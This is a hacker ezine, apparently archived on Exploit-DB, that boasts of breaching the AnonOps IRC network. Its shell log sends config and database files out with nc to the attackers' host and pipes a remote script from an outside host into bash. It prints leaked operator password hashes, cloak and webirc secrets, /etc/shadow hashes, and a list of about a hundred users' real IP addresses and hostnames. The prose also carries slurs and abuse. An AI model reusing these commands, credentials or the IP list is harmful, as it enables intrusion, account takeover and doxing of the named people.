Hack The Planet (HTP) Zine 3

EDB-ID:

42900

CVE:

N/A

Author:

HTP

Type:

papers

Platform:

eZine

Published:

2011-11-15

888    888        d8888  .d8888b.  888    d8P  
888    888       d88888 d88P  Y88b 888   d8P  
888    888      d88P888 888    888 888  d8P    
8888888888     d88P 888 888        888d88K    
888    888    d88P  888 888        8888888b    
888    888   d88P   888 888    888 888  Y88b  
888    888  d8888888888 Y88b  d88P 888   Y88b  
888    888 d88P     888  "Y8888P"  888    Y88b
                             _____          
8888888888 888           ,-:` \;',`'-
888        888         .'-;_,;  ':-;_,'.
888        888        /;   '/    ,  _`.-\
8888888    888       | '`. (`     /` ` \`|
888        888       |:.  `\`-.   \_   / |
888        888       |     (   `,  .`\ ;'|
888        888        \     | .'     `-'/
8888888888 88888888    `.   ;/        .'
                         `'-._____.-'`
                                     
8888888b.  888             d8888 888b    888 8888888888 88888888888        d8888
888   Y88b 888            d88888 8888b   888 888            888           d88888
888    888 888           d88P888 88888b  888 888            888          d88P888
888   d88P 888          d88P 888 888Y88b 888 8888888        888         d88P 888
8888888P"  888         d88P  888 888 Y88b888 888            888        d88P  888
888        888        d88P   888 888  Y88888 888            888       d88P   888
888        888       d8888888888 888   Y8888 888            888      d8888888888
888        88888888 d88P     888 888    Y888 8888888888     888     d88P     888
                <shitstorm> lol who the fuck is carlos
                              CARLOS1337
                               PRESENTE
                          LOL ANONOPS MUERTO
                           CERO DIA EDICION
            
 ┌─────────────────────────┐
 │ :: Table of Contents :: │
 ├─────────────────────────┤
 │ 0x01 ~ Prefac3          │
 ├─────────────────────────┤
 │ 0x02 ~ s3rv1c3s pwn     │
 ├─────────────────────────┤
 │ 0x03 ~ iRCd pwn         │
 ├─────────────────────────┤
 │ 0x04 ~ b0x pwn          │
 ├─────────────────────────┤
 │ 0x05 ~ 1ps              │
 ├─────────────────────────┤
 │ 0x06 ~ l0l sh1t         │
 ├─────────────────────────┤
 │ 0x07 ~ FiL3z            │
 ├─────────────────────────┤
 │ 0x08 ~ ex1t             │
 └─────────────────────────┘

                            :: 0x01 - Prefac3 ::
            
    Over the course of the following months, it has become very clear to us that
AnonOps no longer stands for the values of open speech, freedom of opinion and
has instead transformed itself into a network rampent with trolls, abusive
channel operators, and a generally unwelcoming place for those whom wish to
communicate and gather to fight the powers of corruption, and those whom wish
to censor our open internet. Various attempts have been made in the past to
course correct AnonOps, but the totalitarian IRC operator regime has remained
intact.
    The AnonOps network prides itself in being "secure", however, such is not
the case. Rather, they employ incompetent and highly unprofessional channel and 
IRC operators, allowing their personal grudges to interfere with the operation
of a secure network for Anonymous. Newcomers to the network are welcomed by a
spirit of condescention and arrogance, as any legitimate question or concern is
slowly drowned out by the laughter of the senior members of the chatroom.
Channel operators rather than discourage such behavior, applaud it, joining in,
and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
to speak out against the way the network is ran is met with kick, ban, or zline.
A decentralized organization such as Anonymous cannot thrive on a network ran by
such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
an idea; ideas are bulletproof. 
    Anonymous cannot be owned or controlled by a small group of faggot
totaltarian operators. Thus we have decided to lombotomize the cancer that is
AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
against us as an agent of censorship, unlulzy pseudo-activism and immense
faggotry, and thus must be eliminated. 
    AnonOps has proven itself insecure and fault prone in the past. We are here
to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
actions, they have proven themselves against our ideals. Welcome to thecourt of
the internet, AnonOps. You shall be persecuted for your crimes against the
freedom of chats, your utter and repeated failure as an IRC network, your aid to
the spread of namefagging, and your gross negligence in securing the identities
of those whom chat and remain Anonymous on your network. 
    AnonOps has shown time and time again it is too large of a target, and very
well capable of corrupting the ideals which fuels the fight in every Anon.
As long as AnonOps stay online, they will continue to adulterate our cause,
bastardizing ideals of Anonymous, and running a network where the only lulz to
be had are that of the failures whom chat there and run the network. Such
activity cannot continue. 

Let's drop the formalities now, and get down to business!

                        :: 0x02 - s3rv1c3s pwn ::
                 ¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
        ~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~

After probing AnonOps for quite a while, we figured out that they were using
a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
zero day we were able to get ourselves a reverse shell.

 connect to [REDACTED] from 46.182.105.86 38604
[anonops@ns1 ~]$ id
uid=502(anonops) gid=502(anonops) groups=502(anonops)

# Let's go ahead and snag ourselves some juicy files... 
[anonops@ns1 ~]$ cd ~/inspircd/run/conf
[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
[anonops@ns1 conf]$ cd ~/services
[anonops@ns1 services]$ nc htp 443 < nick.db
[anonops@ns1 services]$ nc htp 443 < chan.db
[anonops@ns1 services]$ nc htp 443 < oper.db
[anonops@ns1 services]$ nc htp 443 < os_info.db

# And then let's go ahead and hook services.
[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
[anonops@ns1 services]$ killall services; ./services; exit


                         :: 0x02 - iRCd pwn ::
                              ¡Dios Mios!

<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">

<power hash="sha256"
    diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
    restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">

<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
    hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
    commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
    modes="+xiw">
    
<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
    hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
    commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
    modes="+xiw">

<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
    globalmax="5000" useident="no" modes="+xwi">
<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
    globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
    globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
    globalmax="5000" useident="no" modes="+wxi">

<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
    softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
    localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
    
<cidr ipv4clone="32" ipv6clone="128">
<channels users="50" opers="100">
<banlist chan="*" limit="128">
<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
    fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
    cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
    allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
    serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
    invitebypassmodes="no">
<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
    quietbursts="yes" nouserdns="no">
<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
    hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
    maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
    restrictbannedusers="yes" genericoper="yes" userstats="">
<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
    maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">

<badnick nick="ChanServ" reason="Reserved For Services">
<badnick nick="NickServ" reason="Reserved For Services">
<badnick nick="OperServ" reason="Reserved For Services">
<badnick nick="MemoServ" reason="Reserved For Services">
<badnick nick="BotServ" reason="Reserved For Services">
<badnick nick="vHostServ" reason="Reserved For Services">
<badhost host="IRCLOIC@*" reason="wrong server">

<uline server="services.anonops.in" silent="yes">
<uline server="defender.anonops.in" silent="yes">

# Oper Classes
<class name="Root"
    commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
    GRELOADMODULE CLEARCACHE">
<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
    GLOADMODULE GUNLOADMODULE SQUIT"
    privs="users/auspex channels/auspex servers/auspex users/mass-message
    channels/high-join-limit channels/set-permanent users/flood/no-throttle
    users/flood/increased-buffers" usermodes="*" chanmodes="*">
<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
    CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
    RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
    channels/high-join-limit" usermodes="*" chanmodes="*">
<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
    chanmodes="*" privs="users/mass-message">
<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
    CHECK CHGNAME" usermodes="*" chanmodes="*">
<class name="OperUnlag" privs="users/flood/no-throttle
    users/flood/increased-buffers">
<class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
    OJOIN FILTER CBAN">

# Oper Types
<type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
    HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
<type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
    ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
<type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
    vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
    MODEDEVOICE MODEHALFOP MODEDEHALFOP">
<type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
<type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
    ServerLink Shutdown" vhost="servadmin.anonops.li"
    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">

# Oper List
<oper name="power2all" hash="sha256"
    password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
    host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="Cody" hash="sha256"
    password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pi" hash="sha256"
    password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
    host="*@*" vhost="anonops.staff" type="RootAdmin">
<oper name="p0ke" hash="sha256"
    password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="jaychow" hash="sha256"
    password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="shitstorm" hash="sha256"
    password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
    host="*@*" vhost="staff.anonops.li" type="RootAdmin">
#<oper name="Isis" hash="sha256"
#   password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
#   host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="Nerdo" hash="sha256"
#   password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
#   host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="evilworks" hash="sha256"
    password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="Jupiler" hash="sha256"
    password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="sharpie" hash="sha256"
#   password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
#   host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="daboogieman" hash="sha256"
    password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pie" hash="sha256"
    password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
    host="*@*" vhost="staff.anonops.li" type="NetAdmin">

# Default Modules Configs
<module name="m_md5.so">
<module name="m_sha256.so">
<module name="m_ripemd160.so">

<module name="m_alias.so">
<alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
    uline="yes">
<alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
    uline="yes">
<alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
    uline="yes" operonly="yes">
<alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
    uline="yes">
<alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
    uline="yes">
<alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
    uline="yes">
<alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
<alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
<alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
    operonly="yes">
<alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
<alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
<alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
<alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
    uline="yes">

<module name="m_allowinvite.so">
<module name="m_alltime.so">
<module name="m_auditorium.so">
<auditorium opvisible="no" opcansee="yes" opercansee="yes">
<module name="m_blockcolor.so">
<module name="m_botmode.so">
<module name="m_callerid.so">
<callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
<module name="m_chancreate.so">
<module name="m_chanprotect.so">
<chanprotect noservices="no" qprefix="~" aprefix="&" deprotectself="yes"
    deprotectothers="yes">
<module name="m_check.so">
<module name="m_chghost.so">
<module name="m_chgident.so">
<module name="m_chgname.so">
<module name="m_cloaking.so">
<cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
<module name="m_close.so">
<module name="m_clones.so">
<module name="m_conn_umodes.so">
#<module name="m_connectban.so">
#<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
<module name="m_dccallow.so">
<dccallow blockchat="yes" length="0" action="block">
<banfile pattern="*" action="block">
<module name="m_delayjoin.so">
<module name="m_devoice.so">
<module name="m_dnsbl.so">
<dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
    reason="DroneBL" duration="30d" bitmask="253">
<dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
    reason="ProxyBL" duration="30d" bitmask="253">
<dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
    reason="EFnetRBL" duration="30d" bitmask="253">
<module name="m_filter.so">
<filteropts engine="pcre">
<module name="m_globalload.so">
<module name="m_globops.so">
<module name="m_halfop.so">
<module name="m_hidechans.so">
<hidechans affectsopers="false">
<module name="m_hideoper.so">
<module name="m_inviteexception.so">
<module name="m_joinflood.so">
<module name="m_knock.so">
<module name="m_lockserv.so">
<module name="m_maphide.so">
<module name="m_messageflood.so">
<module name="m_muteban.so">
<module name="m_conn_waitpong.so">
<waitpong sendsnotice="yes" killonbadreply="no">
<module name="m_nickflood.so">
<module name="m_nicklock.so">
<module name="m_nonotice.so">
<module name="m_noctcp.so">
<module name="m_nokicks.so">
<module name="m_nonicks.so">

#Oper modules
<module name="m_operchans.so">
<module name="m_ojoin.so">
<ojoin prefix="" notice="no" op="no">
<module name="m_operjoin.so">
<operjoin channel="#opers" override="no">
<module name="m_opermotd.so">
<opermotd file="oper.motd" onoper="yes">
<module name="m_override.so">
<module name="m_password_hash.so">
<module name="m_redirect.so">
<module name="m_regex_glob.so">
<module name="m_regex_posix.so">
<module name="m_regex_pcre.so">
<module name="m_regonlycreate.so">
<module name="m_rline.so">
<module name="m_sajoin.so">
<module name="m_sakick.so">
<module name="m_samode.so">
<module name="m_sanick.so">
<module name="m_sapart.so">
<module name="m_satopic.so">
<module name="m_securelist.so">
<securehost exception="*@*.searchirc.org">
<securehost exception="*@*.netsplit.de">
<securehost exception="*@bot.search.mibbit.com">
<module name="m_sethost.so">
<module name="m_setident.so">
<module name="m_setname.so">
<module name="m_seenicks.so">
<module name="m_services_account.so">
<module name="m_showwhois.so">
<module name="m_shun.so">
<shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
<module name="m_spanningtree.so">
<module name="m_sslmodes.so">
<module name="m_ssl_gnutls.so">
<module name="m_sslinfo.so">
<module name="m_stripcolor.so">
<module name="m_svshold.so">
<module name="m_swhois.so">
<module name="m_timedbans.so">
<module name="m_tline.so">
#<module name="m_xline_db.so">

#Mibbit Blocks
<module name="m_cgiirc.so">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
    mask="64.62.228.82">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
    mask="207.192.75.252"> 
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
    mask="78.129.202.38"> 
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
    mask="109.169.29.95"> 

# P0ke's WebIRC
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">


                        :: 0x04 - b0x pwn ::

[anonops@ns1 run]$ base64 utmp
[anonops@ns1 etc]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
shitstorm:x:500:500::/home/shitstorm:/bin/bash
anonops:x:501:501::/home/anonops:/bin/bash
owen:x:502:502::/home/owen:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin

# IT GETS BETTER!
[anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::

                    :: 0x05 ~ 1pS ::
                   
# These were posted on pastebin, but it didnt seem to get as much attention
# as whoever posted it wanted it to get. All these are from a vulnerable
# CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
# What a fucking idiot.

ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
Anon23845 95.140.125.37 free-125-37.mediaworksit.net
AnonFin 194.110.178.3 mail2.paf.fi
AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
B2F 173.84.223.70
Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
Caleb 94.75.255.118 hosted-by.leaseweb.com
DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
HIv 95.140.125.37 free-125-37.mediaworksit.net
Haze 12.18.245.219
Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
LOLOL 0.0.7.209
LTD 174.127.99.174 174.127.99.174.static.midphase.com
Lumina 186.188.228.113
M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
RetSnom 138.199.70.143
Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
anon4347 75.149.43.213 fabgraphics.com
anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
boho 173.23.64.22 173-23-64-22.client.mchsi.com
br4incr4sh 81.56.209.237 server.abcdeflorent.com
chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
digger 0.0.0.2
don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
e 209.212.149.109 za.l.to
eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
heckl 68.68.108.159
imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
k1tt3n 213.251.194.76
k3ymaster 173.245.64.95
koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
madmaster 77.247.181.162 chomsky.torservers.net
manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
naSignal 193.138.216.101 tor-proxy.vm.31173.se
nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
nononn 46.239.119.58 host095577.olf.sgsnet.se
nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
ph33r 68.170.73.247 247.73.170.68.belairinternet.com
phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
risk 202.59.80.158
savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
sd 0.0.7.209
sdk 201.82.181.124 c952b57c.virtua.com.br
sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
sprinkles 213.46.138.76 d138076.upc-d.chello.nl
subz3r0e 41.202.225.156
triPPy 173.245.64.183 173.245.64.160
tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
veritas 0.0.7.209
workbench 50.71.143.81
wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
xent 77.247.181.162 chomsky.torservers.net
zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
zxcvsd 95.140.125.37 free-125-37.mediaworksit.net

                    
                   :: 0x06 ~ l0l sh1t ::

Here's a bit of quotes we found funny.
                            
        _       _                       _                            
       | |     | |                     (_)                           
     __| | __ _| |__   ___   ___   __ _ _  ___ _ __ ___   __ _ _ __  
    / _` |/ _` | '_ \ / _ \ / _ \ / _` | |/ _ \ '_ ` _ \ / _` | '_ \ 
   | (_| | (_| | |_) | (_) | (_) | (_| | |  __/ | | | | | (_| | | | |
    \__,_|\__,_|_.__/ \___/ \___/ \__, |_|\___|_| |_| |_|\__,_|_| |_|
                                   __/ |                             
                                  |___/                              
                                                   
<daboogieman> now that i'm an oper im no longer accepting PM's from anyone
    because i feel that i have too much else to do ( being an oper and all)
<daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
    and /kill <nick>
<daboogieman> any attempt by a non-oper to chat to me will be met by instand
    gline and/or kill	
        _      
       (_)     
  _ __  _  ___ 
 | '_ \| |/ _ \
 | |_) | |  __/
 | .__/|_|\___|
 | |           
 |_|           


<pie>!ban *!*@*
<anon>what the fuck
<pie>its ok i can do whatever i want because im drunk
<pie>it will be fine in the morning
                           
               _      _     
              | |    | |    
      ___ __ _| | ___| |__  
     / __/ _` | |/ _ \ '_ \ 
    | (_| (_| | |  __/ |_) |
     \___\__,_|_|\___|_.__/ 
                        
                        
<Caleb>fuck my vps just got hacked with a ddos attack
<Caleb>morning
